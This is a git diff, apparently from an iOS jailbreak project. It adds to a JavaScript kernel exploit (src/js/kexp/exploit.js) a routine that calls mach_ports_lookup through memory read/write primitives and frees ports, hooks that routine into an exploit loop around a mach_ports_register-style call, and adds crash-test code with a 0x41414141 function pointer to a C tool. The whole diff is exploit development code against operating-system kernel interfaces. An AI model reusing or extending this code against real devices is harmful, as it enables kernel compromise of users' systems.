diff options
| -rwxr-xr-x | src/js/kexp/exploit.js | 28 | ||||
| -rwxr-xr-x | tools/testlol.c | 12 |
2 files changed, 39 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 7ec7cc3..55ac673 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -368,6 +368,32 @@ function mach_ports_lookup_shit() { // return 0x42603; } +function mach_ports_lookup_shit_dealloc() { + printf("fuck\n"); + var arrz = shit_heap(4); + printf("fuck\n"); + write_u32(arrz, 0); + printf("fuck\n"); + var sz = shit_heap(4);; + printf("fuck\n"); + write_u32(sz, 3); + printf("fuck\n"); +// var mts = mach_task_self(); + printf("fuck\n"); + calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); + scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); + printf("mpl success\n"); + + for (var i = 0; i < read_u32(sz); i++) { + if (read_u32(read_u32(arrz) + (i << 2)) != 0) { + mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2))); + } + } + + return read_u32(read_u32(arrz) + 8); +// return 0x42603; +} + var kernel_task_addr = 0; function get_kernel_task() { var ret = 0; @@ -458,7 +484,7 @@ again: while (true) { var arrmpt = shit_heap(8); write_u32(arrmpt, 0); write_u32(arrmpt + 4, 0); - mach_ports_lookup_shit(); + mach_ports_lookup_shit_dealloc(); var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3); mach_ports_lookup_shit(); printf("%d %s\n", ret__, mach_error_string(ret__)); diff --git a/tools/testlol.c b/tools/testlol.c index d39bf47..fa0c1d9 100755 --- a/tools/testlol.c +++ b/tools/testlol.c @@ -107,6 +107,14 @@ kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, ma return ret;
}
+void (*ptr)() = (void (*)())0x41414141;
+
+static kern_return_t r3gister(task_t task, mach_port_array_t init_port_set, mach_msg_type_number_t real_count, mach_msg_type_number_t fake_count)
+{
+ ptr();
+ printf("%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p\n");
+}
+
struct test {
int a;
int b;
@@ -242,6 +250,10 @@ int main(int argc, char* argv[]) { mach_port_t *arrz=0;
printf("%p %p\n", arrz, &arrz);
+ mach_port_t arr[2] = {MACH_PORT_NULL,MACH_PORT_NULL};
+ r3gister(0x41414141,arr,0x42424242,3);
+ printf("r3gister done\n");
+
#pragma pack(4)
typedef struct {
|